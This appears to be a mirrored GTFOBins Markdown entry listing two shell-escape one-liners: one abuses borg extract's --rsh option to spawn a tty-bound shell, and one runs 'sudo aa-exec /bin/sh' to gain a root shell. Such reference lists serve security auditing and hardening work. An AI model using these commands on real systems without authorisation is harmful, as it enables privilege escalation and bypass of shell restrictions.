mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-15 00:01:45 +01:00
9 lines
164 B
Markdown
9 lines
164 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: >
|
|
borg extract @:/::: --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
|
|
sudo:
|
|
- code: sudo aa-exec /bin/sh
|
|
---
|